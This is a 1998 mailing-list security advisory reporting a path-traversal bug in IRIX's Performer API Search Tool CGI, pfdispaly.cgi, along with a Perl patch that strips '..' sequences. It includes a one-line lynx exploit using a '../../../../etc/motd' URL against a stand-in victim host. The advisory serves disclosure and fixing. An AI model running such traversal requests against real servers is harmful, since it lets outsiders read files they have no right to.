IRIX performer_tools bug

From: J.A. Gutierrez (spdat_private)
Date: Mon Mar 16 1998 - 15:06:48 PST

        Do you remember the /cgi-bin/handler bug?

        Well, more of the same:

        Software:
        IRIX 6.2
        performer_tools.sw.webtools (Performer API Search Tool 2.2)
        /var/www/cgi-bin/pfdispaly.cgi

        Bug: Anyone can read files (as 'nobody') from your system:

        Exploit:

        lynx -source \
        'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'

        for instance :-)

        Fix:

    *** pfdispaly.cgi.O     Mon Mar 16 23:13:34 1998
    --- pfdispaly.cgi       Mon Mar 16 23:36:29 1998
    ***************
    *** 14,19 ****
    --- 14,20 ----
      $fullcgiroot = "/var/www$cgiroot";

      $shortfilepath = "$ARGV[0]";
    + $shortfilepath =~ s/\.{2,}//g;
      $fullfilepath = "$maindocroot$shortfilepath";
      ($filename = $shortfilepath) =~ s/.*\/(.*)$/$1/;

        Note: I haven't tested the other Performer CGI's too much,
        maybe they will have more nasty bugs.
        (in fact, pfdispaly.cgi opens "$ARGV[0]" with "$maindocroot"
        prepended; but somewhere 'dangerous' characters are escaped)

        There is another bug at pfsearch.cgi; which lacks of
        print "Content-type: text/html\n\n";
        line, so you get garbage in your browser.

        (and even worse, you have to enable JavaScript if you want
        to use this set of CGIs...)

    --
        J.A. Gutierrez                                   So be easy and free
                                                when you're drinking with me